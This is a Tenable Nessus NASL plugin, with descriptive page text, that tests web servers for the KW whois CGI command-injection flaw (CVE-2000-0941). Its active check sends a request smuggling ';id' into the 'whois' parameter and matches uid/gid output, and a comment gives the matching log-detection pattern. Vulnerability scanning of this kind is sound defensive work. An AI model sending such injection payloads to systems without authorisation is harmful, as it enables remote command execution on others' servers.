nessusThis script is Copyright (C) 2000-2021 Tenable Network Security, Inc.KW_WHOIS.NASL
HistoryNov 29, 2002 - 12:00 a.m.

KW Whois CGI whois Parameter Arbitrary Command Execution

2002-11-2900:00:00
This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.
www.tenable.com
56

The version of the KW whois CGI script installed on the remote web server fails to filter shell metacharacters from input to the 'whois' parameter. An unauthenticated, remote attacker can leverage this issue to execute arbitrary commands with the privileges of the http daemon.

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

# Registration phase: when the scanner loads the plugin with `description`
# set, the block below only records plugin metadata and then exits, so no
# request is sent to the target from here.
if (description)
{
  script_id(10541);
  script_version("1.29");

  # Public identifiers of the flaw this plugin tests for.
  script_cve_id("CVE-2000-0941");
  script_bugtraq_id(1883);

  script_name(english:"KW Whois CGI whois Parameter Arbitrary Command Execution");
  # NOTE(review): the summary names /cgi-bin/whois.cgi, while the request
  # issued later in this file is "/whois.cgi?..."; presumably the helper
  # prefixes each known CGI directory -- confirm against http.inc.
  script_summary(english:"Checks for the presence of /cgi-bin/whois.cgi");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a CGI script that allows execution of
arbitrary commands.");
  script_set_attribute(attribute:"description", value:
"The version of the KW whois CGI script installed on the remote web
server fails to filter input to the 'whois' parameter of shell
metacharacters.  An unauthenticated, remote attacker can leverage this
issue to execute arbitrary commands with the privileges of the http
daemon.");
  script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2000/Oct/426");
  # NOTE(review): no fix is recorded here. Until one is confirmed, removing
  # the CGI or restricting access to it is the usual containment; a finding
  # from this plugin should not be closed on the strength of this field.
  script_set_attribute(attribute:"solution", value:"Unknown at this time.");

  # CVSS v2 base: network reachable, low complexity, no authentication,
  # partial impact on confidentiality, integrity and availability.
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  # CVSS v2 temporal: functional exploit exists (E:F), no remediation
  # available (RL:U), report confidence not defined (RC:ND).
  script_set_cvss_temporal_vector("CVSS2#E:F/RL:U/RC:ND");
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2000/10/29");
  script_set_attribute(attribute:"plugin_publication_date", value:"2002/11/29");
  script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_end_attributes();

  # ACT_ATTACK: this is an active test. The check in this file sends a
  # request that runs a command on a vulnerable host, so scan scope and
  # authorisation matter more than for a banner-only plugin.
  script_category(ACT_ATTACK);

  script_copyright(english:"This script is Copyright (C) 2000-2021 Tenable Network Security, Inc.");
  script_family(english:"CGI abuses");

  # Scheduling: depends on http_version.nasl, is excluded when the
  # "Settings/disable_cgi_scanning" key is set, and needs a web service
  # (the "Services/www" key or port 80).
  script_dependencie("http_version.nasl");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);
  exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

# Active check: request whois.cgi with `;id` as the value of the 'whois'
# parameter (%3B is the URL-encoded semicolon) and look for `id`-style
# output (uid=<n> ... gid=<n>) in the response.
# NOTE(review): the path carries no directory prefix; presumably
# http_check_remote_code() tries it under each known CGI directory --
# confirm in http.inc.
# Detection: the same request shape in web-server logs (whois.cgi with %3B
# in the 'whois' parameter) marks either this scan or an exploitation
# attempt, so correlate hits with the scan schedule.
http_check_remote_code(
  check_request: "/whois.cgi?action=load&whois=%3Bid",
  check_result:  "uid=[0-9]+.*gid=[0-9]+.*",
  command:       "id"
);